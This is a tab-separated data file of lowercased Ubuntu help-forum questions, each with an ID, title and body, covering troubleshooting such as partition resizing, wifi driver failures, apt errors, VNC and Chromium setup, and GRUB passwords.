393455	how to increase root partition in ubuntu 13.10	how to extend root / partition by sinking swap ( previously 6gb after sinking 4gb , unallocated 2 gb ) and home ( previously 11 gb after sinking 8gb , allocated 3gb ) . how to extend those allocated partition to root ? how to combine those 5gb to / partition ? help me ! ( this is partition extended from 30 gb primary partition ) so if not then , how to combine another 30gb ( currently unallocated ) partition that sinked from another primary volume .
393456	i just want to downgrade ubuntu 13.10 to ubuntu 12.04,	i am finding it problematic after i upgraded to ubuntu 13.10 , now i want to downgrade it to ubuntu 12.04 . how can it be done ?
393458	how to protect from cloning ?	i have no experience using ubuntu before i 'm doing a point of sale project for a restaurant which will run in local lan ( offline not online ) . i will setup one mini pc as an ubuntu web server . and my client will access into it via local lan via http request . the server will be placed inside the restaurant . is it possible to protect from someone who wants to steal my file or clone the entire disk and use it with another restaurant ? or ubuntu already has some mechanism inside to protect someone from doing this , e.g . password require before transfer file out of the computer ? or password needed before clone the disk ? i know nothing about ubuntu , can you please tell me the easiest way to protect my project from being stolen ?
393459	how to setup an alias apache2	i am new to ubuntu and try to use apache to check a website that i am currently developing using joomla ( novice to that too ) . i am trying to setup an alias in httpd.conf , but have not been successful . your help is appreciated .
393461	sudo apt-get update takes a lot of time to load	sudo apt-get update takes a lot of time to load this command is taking too much time to load . about 17 minutes . please tell me why this is happening ? and also , i have only added webupd8 repository . i am haivng lubuntu with 512 mb ram
393462	keyboard not working in ubuntu 12.04 ( lts )	i am using ubuntu 12.04 lts version and i using techcom headphone , when i mute volume by headphone then keyboard is not working . pls help me if anyone knows the solution . your comments are appreciated .
393463	create the home directory while creating a user	i have added user using the adduser command , but a directory with is new user name is not created in /home , and i 'm also not able to run any command with this user . after logging from this user it 's only showing ( $ ) on the screen using a cli
393464	13.10 active directory users are not administrator	in 12.04 i am able to login into ubuntu with my windows domain user login and also i can have admin privileges to install softwares and apps . but in 13.10 i am able to login , but i am not an administrator . administrator of my machine trying to change my account to 'administrator ' from 'standard ' . but when i tried to install any app , it says `` you are not a 'sudo ' user '' .
393466	grub superuser password is required for login on 13.10	according to this documentation : https : //help.ubuntu.com/community/grub2/passwords , i am supposed to be able to just set the superuser password to protect the grub entries . why is grub asking for a password when booting into ubuntu 13.10 ? how do i disable that ? i added the set superusers= '' john '' password john foo export superusers to the /etc/grub.d/40_custom
393468	slow file copy from flash drives ( phone , camera )	os is ubuntu 12.10 and device im trying to copy from is android phone or digital camera . in both cases moving single pictures to attached usb 2.0 hdd or sata disk is ok , but smaller videos and bunch of pictures will grind everyhing to halt . nothing freezes , but i can start numerous other file transfers and non of them move afterwards . process manager shows about 6-8mb of files transferred and thats all , process itself may run at low speed , i have not checked , but it is unusable anyways . thats why i have been using w7 for file transfers . there are similar topics , not with the exact problem , maybe someone can assist ? thanks
393473	ati es1000 on ubuntu server 13.10 boots to black screen	i have an ubuntu server 13.10 that will not boot fully because it has an ati es1000 . if it boots normally , it hangs with a black screen after grub . if i `` edit '' the boot config , it boots into the busybox . if i just `` exit '' out of busybox , it boots into ubuntu fine .
393474	checking media [ fail ] on boot 3	my toshiba keeps getting a message saying checking media fail when im trying to reboot it , someone help what should i do ?
393475	drivers for lenovo thinkpad s540 touchpad ( erratic mouse cursor )	the touch-pad on the thinkpad s540 is extremely erratic ( the cursor often jumps when right-clicking , making it extremely difficult to right click anything , and even left-click sensitivity seems to be very poor ) . i am using ubuntu 12.04.3 lts . the touchpad is an `` all in one '' variety with no separate left and right buttons , but having them built in to the pad area . is there anywhere i can obtain better touchpad drivers ? or generally anything else i can do to improve the mouse behavior ?
393482	ioerror : [ errno 13 ] permission denied . fenics jit compiler	i keep getting the permission denial error : ioerror : [ errno 13 ] permission denied , when i try running making a function space . i think it it something to do with the jit compiler . somehow , all the compiling is done in root and when it tries reading the permission is denied . here is the log of the error i get : lento @ lento-vpcf11c5e : ~/documents/thesis/programs/navierstokes $ python test_navierstokes.py traceback ( most recent call last ) : file `` test_navierstokes.py '' , line 104 , in < module > n=np.array ( [ nx , ny ] ) ) file `` /home/lento/documents/thesis/programs/navierstokes/navierstokes.py '' , line 145 , in __init__ self._nu , self._cfl , self._umax ) file `` /home/lento/documents/thesis/programs/navierstokes/base/ipcs.py '' , line 129 , in __init__ super ( ipcs , self ) .__init__ ( mesh , boundarydomains , nu , cfl , umax ) file `` /home/lento/documents/thesis/programs/navierstokes/base/solverbase.py '' , line 68 , in __init__ self.boundary_dofcoordinates , self.boundary_vectordofindex = boundary.locate_boundarydofs ( self.mesh , self.boundarydomains,3 ) file `` /home/lento/documents/thesis/programs/navierstokes/base/boundary.py '' , line 125 , in locate_boundarydofs v = dolfin.functionspace ( mesh , `` cg '' , p ) file `` /usr/lib/python2.7/dist-packages/dolfin/functions/functionspace.py '' , line 403 , in __init__ functionspacebase.__init__ ( self , mesh , element , constrained_domain ) file `` /usr/lib/python2.7/dist-packages/dolfin/functions/functionspace.py '' , line 84 , in __init__ ufc_element , ufc_dofmap = jit ( self._ufl_element ) file `` /usr/lib/python2.7/dist-packages/dolfin/compilemodules/jit.py '' , line 60 , in mpi_jit return local_jit ( *args , **kwargs ) file `` /usr/lib/python2.7/dist-packages/dolfin/compilemodules/jit.py '' , line 122 , in jit return jit_compile ( form , parameters=p , common_cell=common_cell ) file `` /usr/lib/python2.7/dist-packages/ffc/jitcompiler.py '' , line 76 , in jit return jit_element ( ufl_object , parameters ) file `` /usr/lib/python2.7/dist-packages/ffc/jitcompiler.py '' , line 252 , in jit_element compiled_form , module , form_data , prefix = jit_form ( form , parameters ) file `` /usr/lib/python2.7/dist-packages/ffc/jitcompiler.py '' , line 179 , in jit_form module = instant.import_module ( module_name , cache_dir=cache_dir ) file `` /usr/lib/python2.7/dist-packages/instant/cache.py '' , line 156 , in import_module return check_disk_cache ( modulename , cache_dir , moduleids ) file `` /usr/lib/python2.7/dist-packages/instant/cache.py '' , line 113 , in check_disk_cache lock = get_lock ( cache_dir , modulename ) file `` /usr/lib/python2.7/dist-packages/instant/locking.py '' , line 81 , in get_lock lock = open ( os.path.join ( cache_dir , lockname ) , `` w '' ) ioerror : [ errno 13 ] permission denied : '/home/lento/.instant/cache/ffc_form_3d305e9085738f267ea73581b5f0769fda1e332d.lock'
393483	ubuntu 13.04 freezes on mac book pro	i am running ubuntu on a mid-2010 macbookpro 15 '' . i totally removed all osx software and only ubuntu exist on 1tb drive , 8gb of ram . i got 13.04 installed successfully but every so often ( at least once a day ) the laptop will completely freeze up . neither the mouse or keyboard functions . my questions is how do i recover from these freezes without resorting to a hard shutdown ? also , some times when i restart or turn my laptop on i get a command prompt screen asking to log in and enter password . why ?
393485	how to resize ubuntu 13.10 partition without reinstaling ubuntu	how to merge that unallocated 11gb partition to sda5 `` / '' ( which is extended partition under sda3 ) please help me i m out of space ! *i m unable to merge that unallocated partition with sda5 nor sda3 : ( i m new to ubuntu
393487	wifi connection fails after updates in 12.04	have ubuntu 12.04 lts on a medion laptop . dec 18 got some ubuntu updates , after these updates the wifi no longer works ( rt2790 ) . booting the laptop form intallation cd wifi works , normal reboot , wifi does not work , wired connection works . how to fix this ? tine @ laptop-tine : ~ $ sudo lshw -c network [ sudo ] password for tine : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 01 serial : 00:1f:16:1d:89:40 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt- fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.0.150 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : f6000000-f6000fff memory : f0000000-f001ffff *-network unclaimed description : network controller product : rt2790 wireless 802.11n 1t/2r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:08:00.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fa000000-fa00ffff tine @ laptop-tine : ~ $ cat /var/log/dpkg.log | grep `` ^2013-12-18 . *\ installed\ `` 2013-12-18 20:29:33 status installed man-db 2.6.1-2ubuntu1 2013-12-18 20:29:35 status installed libcurl3-gnutls 7.22.0-3ubuntu4.6 2013-12-18 20:29:35 status installed libcurl3 7.22.0-3ubuntu4.6 2013-12-18 20:29:35 status installed libcurl3-nss 7.22.0-3ubuntu4.6 2013-12-18 20:29:36 status installed libqtcore4 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:36 status installed libqt4-xml 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:36 status installed libqt4-dbus 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:36 status installed libqt4-network 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:37 status installed libqt4-script 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:37 status installed libqt4-sql 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:37 status installed libqt4-xmlpatterns 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:38 status installed libqt4-sql-sqlite 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:38 status installed qdbus 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:39 status installed gnome-desktop3-data 3.4.2-0ubuntu0.2 2013-12-18 20:29:39 status installed libgnome-desktop-3-2 3.4.2-0ubuntu0.2 2013-12-18 20:29:39 status installed libdjvulibre-text 3.5.24-9ubuntu0.1 2013-12-18 20:29:39 status installed libdjvulibre21 3.5.24-9ubuntu0.1 2013-12-18 20:29:40 status installed libqtgui4 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:40 status installed libqt4-declarative 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:40 status installed libqt4-opengl 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:40 status installed libqt4-svg 4:4.8.1-0ubuntu4.5 2013-12-18 20:29:41 status installed libc-bin 2.15-0ubuntu10.5 tine @ laptop-tine : ~ $ just noticed ( while connecting the laptop to wired network in order to post updates i got some upgates . tine @ laptop-tine : ~ $ cat /var/log/dpkg.log | grep `` ^2013-12-22 . *\ installed\ `` 2013-12-22 09:30:29 status installed libnss3 3.15.3.1-0ubuntu0.12.04.1 2013-12-22 09:30:29 status installed libnss3-1d 3.15.3.1-0ubuntu0.12.04.1 2013-12-22 09:30:29 status installed libc-bin 2.15-0ubuntu10.5 tine @ laptop-tine : ~ $ will check 22/12/2013 10:00 installed requested wicd , does not change a thing , still ca n't find wireless networks ( while it worked before without wicd ) tine @ laptop-tine : ~ $ cat /var/log/dpkg.log | grep `` ^2013-12-22 . *\ installed\ `` 2013-12-22 09:30:29 status installed libnss3 3.15.3.1-0ubuntu0.12.04.1 2013-12-22 09:30:29 status installed libnss3-1d 3.15.3.1-0ubuntu0.12.04.1 2013-12-22 09:30:29 status installed libc-bin 2.15-0ubuntu10.5 2013-12-22 10:01:37 status installed ureadahead 0.100.0-12 2013-12-22 10:01:42 status installed man-db 2.6.1-2ubuntu1 2013-12-22 10:01:44 status installed fontconfig 2.8.0-3ubuntu9.1 2013-12-22 10:01:44 status installed desktop-file-utils 0.20-0ubuntu3 2013-12-22 10:01:44 status installed bamfdaemon 0.2.126-0ubuntu1 2013-12-22 10:01:45 status installed gnome-menus 3.4.0-0ubuntu1 2013-12-22 10:01:48 status installed hicolor-icon-theme 0.12-1ubuntu2 2013-12-22 10:01:49 status installed doc-base 0.10.3 2013-12-22 10:01:50 status installed mysql-common 5.5.34-0ubuntu0.12.04.1 2013-12-22 10:01:50 status installed libmysqlclient18 5.5.34-0ubuntu0.12.04.1 2013-12-22 10:01:51 status installed python-wicd 1.7.2.3-1ubuntu0.1 2013-12-22 10:01:54 status installed wicd-daemon 1.7.2.3-1ubuntu0.1 2013-12-22 10:01:55 status installed collectd-core 4.10.1-2.1ubuntu7 2013-12-22 10:01:55 status installed libdbi1 0.8.4-5.1 2013-12-22 10:01:56 status installed librrd4 1.4.7-1 2013-12-22 10:01:58 status installed collectd 4.10.1-2.1ubuntu7 2013-12-22 10:01:59 status installed collectd-dev 4.10.1-2.1ubuntu7 2013-12-22 10:01:59 status installed libcollectdclient0 4.10.1-2.1ubuntu7 2013-12-22 10:01:59 status installed collectd-utils 4.10.1-2.1ubuntu7 2013-12-22 10:01:59 status installed libapparmor1 2.7.102-0ubuntu3.9 2013-12-22 10:02:00 status installed libesmtp6 1.0.6-1build2 2013-12-22 10:02:00 status installed libnuma1 2.0.8~rc3-1 2013-12-22 10:02:00 status installed libopenipmi0 2.0.18-0ubuntu3 2013-12-22 10:02:01 status installed liboping0 1.6.1+2.g207d51d-2build1 2013-12-22 10:02:01 status installed libpq5 9.1.11-0ubuntu0.12.04 2013-12-22 10:02:01 status installed libupsclient1 2.6.3-1ubuntu1.1 2013-12-22 10:02:01 status installed libxenstore3.0 4.1.5-0ubuntu0.12.04.2 2013-12-22 10:02:02 status installed libvirt0 0.9.8-2ubuntu17.16 2013-12-22 10:02:02 status installed python-glade2 2.24.0-3 2013-12-22 10:02:03 status installed python-urwid 1.0.1-2 2013-12-22 10:02:03 status installed ttf-dejavu-extra 2.33-2ubuntu1 2013-12-22 10:02:03 status installed ttf-dejavu 2.33-2ubuntu1 2013-12-22 10:02:04 status installed wicd-gtk 1.7.2.3-1ubuntu0.1 2013-12-22 10:02:04 status installed wicd-curses 1.7.2.3-1ubuntu0.1 2013-12-22 10:02:04 status installed wicd-cli 1.7.2.3-1ubuntu0.1 2013-12-22 10:02:05 status installed wicd 1.7.2.3-1ubuntu0.1 2013-12-22 10:02:05 status installed collectd-dbg 4.10.1-2.1ubuntu7 2013-12-22 10:02:05 status installed libmemcached6 0.44-1.1build1 2013-12-22 10:02:05 status installed libtokyocabinet8 1.4.37-6.1build1 2013-12-22 10:02:06 status installed libtokyotyrant3 1.1.40-4.1build1 2013-12-22 10:02:06 status installed rrdtool 1.4.7-1 2013-12-22 10:02:06 status installed libc-bin 2.15-0ubuntu10.5 31/12/2013 reinstalled system from dvd , downloaded 202 updates , wifi works again . tine @ laptop-tine : ~ $ sudo lshw -c network [ sudo ] password for tine : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 01 serial : 00:1f:16:1d:89:40 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:43 ioport:2000 ( size=256 ) memory : f6000000-f6000fff memory : f0000000-f001ffff *-network description : wireless interface product : rt2790 wireless 802.11n 1t/2r pcie vendor : ralink corp. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 00 serial : 00:22:43:97 : cc : b5 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2800pci driverversion=3.8.0-34-generic firmware=0.34 ip=192.168.0.219 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : fa000000-fa00ffff tine @ laptop-tine : ~ $
393488	graphical interface does n't show during installation	i have a new computer that i got yesterday . i am trying to dual boot win8 and 13.10 after disabling the secure boot stuff in the bios . however , the only screen that displays is the one that prompts for `` try ubuntu , install ubuntu and oem '' . when i select any of those options , i hear my external dvd drive go to work and then stop . nothing shows up further in the ui .
393492	how to run ubuntu desktop apps on android	i would like to be able to run ubuntu desktop applications on my note 3 without rooting my device . how do i do that ? running on galaxy note 3 n9005 android 4.3
393500	how do i uninstall the mention beta for ubuntu ?	i recently installed the mention beta for ubuntu , a tool to track mentions in social media . the install is a bin file that you have to install from the command line . there 's no uninstaller and apt-get remove mention does not find the package . how do i remove it ?
393506	symlink for /home/	by installing windows 8.1 i removed whole linux partition ( 33gb ) including swap part ( sorry for my stupidity ) ... but i had my whole /home/ folder on other partition . i installed lubuntu again . how to get rid of current home and connect my previously created /home/ ? my current disk and boot info : http : //paste.ubuntu.com/6605992/ /home/ partition that i want to link have size ~149-160gb . please send me terminal commands to connect /home/ back . i 'm not experienced linux user and i 'm using it only for few days . please send me terminal commands to do that based on the paste that i added above
393508	no network in ubuntu 13.10	my wifi key works fine when i use windows 7 , but it does n't go blue ( on ) when i press it . the lan port , as well , does n't show any internet connections . but internet is fine when i use windows 7 . i use hp pavilion g series laptop .
393509	problem with alfa awus036h usb wireless adapter ?	good morning all i tried everything but the alfa still not work i tried this topic too : how do i install drivers for the alfa awus036h usb wireless adapter ? but when i put the last comment ( sudo make install ) it didnt work : that what it says : kernel/drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko : kernel/net/mac80211/mac80211.ko kernel/net/wireless/cfg80211.ko kernel/drivers/misc/eeprom/eeprom_93cx6.ko kernel/drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko : kernel/net/mac80211/mac80211.ko kernel/net/wireless/cfg80211.ko kernel/drivers/misc/eeprom/eeprom_93cx6.ko cp : can not create regular file `/etc/acpi/events/ ' : no such file or directory make : *** [ install ] error 1 how to solve this ?
393511	contact the developers ... .ok	when i click on `` crash report '' i get this message ( after i `` check for updates '' ) : failed to load the package list . this is a serious problem . try again later . if this problem appears again , please report an error to the developers . this is what comes up when i click `` details '' for this error : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/linux.dropbox.com_ubuntu_dists_precise_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened . i did a search and found this fix by opening a terminal and entering : sudo rmdir /var/lib/apt/lists/partial sudo rm -r /var/lib/apt/lists/* -vf sudo apt-get update but it asks for my sudo password and when i enter my password it says , sorry try again . i do n't know any other passwords ! i know almost nothing about computers , my friend installed ubuntu for me and he 's stopped giving me answers / advice . now i 'm in china and i have even fewer people around me to help . how to solve this ? i 'm officially `` reporting an error to developers '' . i suppose . ( last time i tried to get help on the forum i got mocked and teased )
393515	apt-get : extra junk after value	i connect via ssh to a virtual machine which runs ubuntu 12.04.2 lts . executing the command sudo apt-get update i get the following error message : e : syntax error /etc/apt/apt.conf.d/10periodic:4 : extra junk after value what can i do ? thanks in advance
393516	how to add a file somewhere in my $ path list	how can achieve what you can see below ? i read this question but did not succeed . my os is lubuntu 13.10 which is based in ubuntu 13.10 you are technically ready to go , but there 's one extra step that i like to do to make command line debugging nice and quick . i create a bash script called `` php-xdebug '' , which automatically starts the debugger engine . the script looks like this ( unix only ) : > # ! /bin/bash export xdebug_config= '' idekey=xdebug '' /usr/bin/php `` $ @ '' < run `` chmod +x '' on the file and put it somewhere in your $ path list , and you can then use this instead of php when debugging . for instance , instead of `` php myscript.php '' , run `` php-xdebug myscript.php '' to start the debugger session .
393517	chromium wo n't run on ubuntu 12.04 with remote desktop vnc ( works on 10.04 )	i 'm running ubuntu 12.04 64-bit vps with 512mb of ram and a 15gb hdd . on separate , fresh/new vps servers , i 've installed lxde , lubuntu and xubuntu using tightvnc - on separate vps server . on all occasions i am unable to use chromium . edit : i tried lxde on ubuntu 10.04 and everything is working . this seems to be an issue on ubuntu 12.04 . to clarify , these are remote vps servers that i vnc into . there is no monitor installed on the remote machine . i click the icon to launch chromium , an purple-ish color screen pops up as it tries to launch , and then in a split second later , it crashes . sometimes i can see the chromium address bar , tabs , etc for a brief moment as it tries to run . if i try to run from the command line i get : chromium-browser xlib extension ârandrâ missing on display `` :1 '' on random instances , chromium will try to send a crash report . in those notes i noticed this ... ca n't open profile /home/user1/.config/chromium/default/preferences i looked in that folder and indeed there is no preferences folder . so i create a preferences folder , try to run chromium and the folder is renamed preferences.bad . i then delete the entire default folder , tried to launch chromium and a new default folder is created . chromium crashes and still no preferences folder is created within that new default folder . seems maybe there is a permissions issue or something , but i ca n't put my finger on it . here is exactly how i install these desktop environments , step-by-step . maybe you can see something i 'm doing wrong . i deploy new 64-bit ubuntu vps . i ssh into the server as root and run the following commands ... apt-get update apt-get upgrade apt-get install lubuntu tightvncserver i then add a vnc user and set passwords ... adduser user1 su - user1 vncpasswd exit as root , i edit /etc/init.d/vncserver # ! /bin/bash path= '' $ path : /usr/bin/ '' export user= '' user1 '' display= '' 1 '' depth= '' 16 '' geometry= '' 1024x768 '' options= '' -depth $ { depth } -geometry $ { geometry } : $ { display } '' . /lib/lsb/init-functions case `` $ 1 '' in start ) log_action_begin_msg `` starting vncserver for user ' $ { user } ' on localhost : $ { display } '' su $ { user } -c `` /usr/bin/vncserver $ { options } '' ; ; stop ) log_action_begin_msg `` stoping vncserver for user ' $ { user } ' on localhost : $ { display } '' su $ { user } -c `` /usr/bin/vncserver -kill : $ { display } '' ; ; restart ) $ 0 stop $ 0 start ; ; esac exit 0 edit home /home/user1/.vnc/xstartup and for this example i add ( for lubuntu ) : # ! /bin/sh # xrdb $ home/.xresources xsetroot -solid grey # x-terminal-emulator -geometry 80x24+10+10 -ls -title `` $ vncdesktop desktop '' & # x-window-manager & export xkl_xmodmap_disable=1 autocutsel -fork openbox & /usr/bin/lxsession -s lubuntu -e lxde & update file permissions to allow users to start x server chown -r user1 . /home/user1/.vnc & & chmod +x /home/user1/.vnc/xstartup sed -i 's/allowed_users . */allowed_users=anybody/g ' /etc/x11/xwrapper.config make /etc/init.d/vncserver executable and start vnc server : chmod +x /etc/init.d/vncserver & & service vncserver start add vnc server to automatically start on reboot : update-rc.d vncserver defaults i then start tightvnc viewer on my windows machine and enter theserverip : :5901 to access the desktop . i 've also tried installing the desktop environment with xrdp and rdp into the desktop as root , and same issue . so i think that eliminates issues with tightvnc . there seems to be no issues with any other applications on the dekstop . firefox works just fine , but unfortunately i need to make chromium work in this case . is there something i 'm doing wrong with my setup ?
393518	apache configure file : how to edit it	i need to edit the apache configure file because i wish to set the debugger port in my virtualhost section as it says below . how can i do it ? i searched in google but it is not clear for me what i should do . php_value xdebug.remote_port 9009
393519	is the sony vaio locked or something ? it seems incapable of having a bootloader ?	i installed ubuntu alongside windows 8 , which i have done before without issues . but when i did it the first time on my sony vaio it installed successfully but there was no bootloader , no way to access ubuntu ; even boot-repair would not fix it . i reinstalled it and this time it boots into ubuntu only , and i 'm locked out of windows . why ca n't i get a boot loader ?
393520	ubuntu 13.04 geary - how to run in the background ?	i 'm using ubuntu 13.04 unity and just decided to try out email client `` geary '' , version 0.4.3 . i find it to be quite nice , but the only problem i have right now , is that i have to have it open all the time . it 's anoying to have it there in my `` tab-switch-pop-up ? '' . is there a way to run it in the background ( checking for emails etc . ) ? thank you .
393522	shift running x window ( display environment ) on ssh x11 forwarding	i want to see remotely some running gui application without kill the current process , i have tried vnc and xrdp , xrdp opens a new blank session , so it is not for me , vnc is good , but not exactly what i need , it uses the screen and devices presents , someone could mess with me moving the mouse or typing on the keyboard . therefore i figured out the only way i could do what i need is managing to shift a running x window from one display to another , thus even on a ssh -x ( x11 forwarding ) i would be able to see it . i am on this quest for a long time and i did n't found out a conclusive solution , that is the reason i am appealing to you . could you help me to solve this trouble ? thanks ,
393526	auto disconnect of wireless internet	i am new to ubuntu 12.04 the network is been always disconnecting . i have tried different dongles but same problem occurs .
393529	firefox fades out when using on ubuntu 13.04	when using the recent version of firefox on ubuntu , it fades in and out and has slow responses as well . is there any reason for this or , better yet , a solution ?
393530	edit 12.04 lts lenovo t60 sound static	i noticed that my sound has a static to it which seems to vary depending on what i 'm doing . i have a lenovo t60 , and am just using the default drivers that came with the 12.04 lts installation . i am testing both using the laptop speakers , and headphones that plug into the audio jack ( non-usb ones ) . as a test , i ran : pasuspender -- speaker-test -c 2 -t sine -d plughw:0 what i notice is that if i let the computer idle during this test , there appear to be short blips every quarter of a second or so . if while running this test i scroll the mouse over the application launcher in a continuous manner i get an almost steady stream of staticy blips in the sine wave . it appears to me that the sound is clipping under heavier cpu usage , but even in idle there are some issues . although this is an 'older ' computer , the sound was working fine when i had a windows installation on here some 6 months ago so i do n't suspect its a hardware failure . how to fix this ? not really sure where to go from there in terms of testing/fixing . any help would be appreciated . edit : apparently this is a known issue on the ubuntu forums , which has not been resolved yet . will post a solution here as well if this ever gets resolved .
393531	usb drive not auto mounting after ejecting	yesterday i plugged my usb drive into my ubuntu 13.10 laptop , it auto mounted and i clicked into a few directories and opened a couple of files , everything looked good . then i ejected it . today i plugged my usb dirve into my laptop ( same usb port ) and nothing happen . no auto mounting , no window appearing , no nothing . complete newb question , what did i do wrong ? cheers , richard
393532	problems with lxc while chrooting a live 13.10 distro	since 10.04 i 'm used to customize a live , edubuntu-based distro we give to our students and all went in the best way until 13.10 came out ; while with other releases i went at the end of customization process , gave last apt-get dist-upgrade , builded iso and tested it both on virtualbox and on a test laptop , starting from 13.10 i get an error about lxc , at the end of apt-get dist-upgrade : impossible to configure lxc because there is n't any configuration script . same if i try to purge out lxc and the other packages lxc related ( templates , liblxc0 , python-lxc ) . and , always , running the iso i get an error at startup : lxc stopped to work . i 've tried to downgrade it ( from 1.0-alpha to 0.9 ) , adding a statement not to upgrade it in dpkg-set-selections ( package lxc hold ) : it seems to work but as soon as i go installing it ( both on vm and a physical machine ) , then i get the same error . is there a way to purge lxc from edubuntu , since for our purposes is totally useless ? thanks , silvia
393538	removing 'wget ' removed the chrome also . why ?	i installed 'axel ' to download the things from internet . so i thought of removing the 'wget ' . but when i did the same using command # sudo apt-get remove wget it removed google chrome as well . why this happened ? rana @ brahma : ~ $ sudo apt-get remove wget [ sudo ] password for rana : sorry , try again . [ sudo ] password for rana : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libfolks-telepathy25 libpurple0 telepathy-salut libfolks-eds25 gir1.2-ubuntuoneui-3.0 libindicate-gtk3 libnspr4-0d telepathy-indicator nautilus-sendto-empathy libmission-control-plugins0 libfolks25 folks-common libnice10 libgssdp-1.0-3 telepathy-haze libubuntuoneui-3.0-1 libavahi-gobject0 libtelepathy-logger2 libtelepathy-farstream2 telepathy-mission-control-5 telepathy-logger telepathy-gabble gstreamer0.10-nice libgupnp-1.0-4 libpurple-bin libmeanwhile1 libzephyr4 libfarstream-0.1-0 libgupnp-igd-1.0-4 empathy-common use 'apt-get autoremove ' to remove them . the following extra packages will be installed : curl the following packages will be removed : flashplugin-installer foomatic-db-engine google-chrome-stable hplip printer-driver-postscript-hp ubuntu-standard wget the following new packages will be installed : curl 0 upgraded , 1 newly installed , 7 to remove and 0 not upgraded . need to get 137 kb of archives . after this operation , 161 mb disk space will be freed . do you want to continue [ y/n ] ? y get:1 http : //archive.linux.duke.edu/ubuntu/ precise-updates/main curl i386 7.22.0-3ubuntu4.6 [ 137 kb ] fetched 137 kb in 2s ( 54.1 kb/s ) ( reading database ... 216983 files and directories currently installed . ) removing flashplugin-installer ... removing foomatic-db-engine ... removing google-chrome-stable ... update-alternatives : using /usr/bin/firefox to provide /usr/bin/x-www-browser ( x-www-browser ) in auto mode . update-alternatives : using /usr/bin/firefox to provide /usr/bin/gnome-www-browser ( gnome-www-browser ) in auto mode . removing printer-driver-postscript-hp ... removing hplip ... removing ubuntu-standard ... removing wget ... processing triggers for update-notifier-common ... processing triggers for cups ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for install-info ... selecting previously unselected package curl . ( reading database ... 216722 files and directories currently installed . ) unpacking curl ( from ... /curl_7.22.0-3ubuntu4.6_i386.deb ) ... processing triggers for man-db ... setting up curl ( 7.22.0-3ubuntu4.6 ) ... and here 's the output of aptitude why google-chorme-stable wget : rana @ brahma : ~ $ aptitude why google-chrome-stable wget p google-chrome-stable depends wget
393540	sane and xsane hp5590 scanjet upside down	my problem is this , my hp 5590 scanner scans and does everything well , until you choose use duplex adf , puts me behind the second image upside down .
393542	screenshot/printscreen does n't work with menus dropped down !	whenever i try to take a screen-shot ( in my ubuntu 12.04 box ) with the global menu , context menu for any window/file , it does n't work . i do n't seem to be able to take snapshots with menu dropped down . how do i get this fixed ? ps . the problem is in both unity and gnome3 environments .
393543	ubuntu uninstall . what partitions i should delete ?	ok , so here is a screenshot of my partitions in gparted : and i just want windows 8 but no more ubuntu at all . i can see a partition that contains linux_swap but how do i delete the sda4 then ? ( it looks like it is protected : ( ) and i should first repair the boot loader ? and how do i set windows 8.1 to boot by default in the windows bootloader ? ( i only have windows 8.1 and ubuntu installed , i am currently using the `` try ubuntu '' option from the livecd , but i do have it installed on my pc as a dual-boot . ) i installed ubuntu without wubi and i do not have uefi since i did update to windows 8 then 8.1 and i had windows 7 with my pc . i just want to know what partitions to delete and if i should first repair bootloader . thanks .
393544	did ubuntu go up in size between versions 13.04 and 13.10 ?	i recently upgraded to ubuntu 13.10 from 13.04 and suddenly i was getting low disk space warnings . i had between 7-5 gb of free space prior to the upgrade and suddenly it was saying that i had 1.1gb of space left . i had n't downloaded any programs before or after the upgrade , and i had n't added any large files . i know that to most people 5 gb of space is n't much to worry about , but when you have a 100gb hdd that is split between windows and ubuntu , it is . i can survive on this much space ( lots of compression eminent ) , but i was n't sure if this is what happens between ubuntu releases or if i need to go looking for something that glitched out during the upgrade .
393549	change the default directory of vsftpd , maybe a permission problem	i was trying to change the default directory of vsftpd from /srv/ftp to /media/mon . and i ca n't visit it from the browser . i wonder if there 's a permission problem , because the /srv is under root yet the /media/mon is under mon . if so , how can i fix this ?
393555	can i install flash player `` pepper '' on chromium with automatic updates ?	if i follow this guide , will the flash version be automatically updated ? or will i need to manually update this api with any new version ?
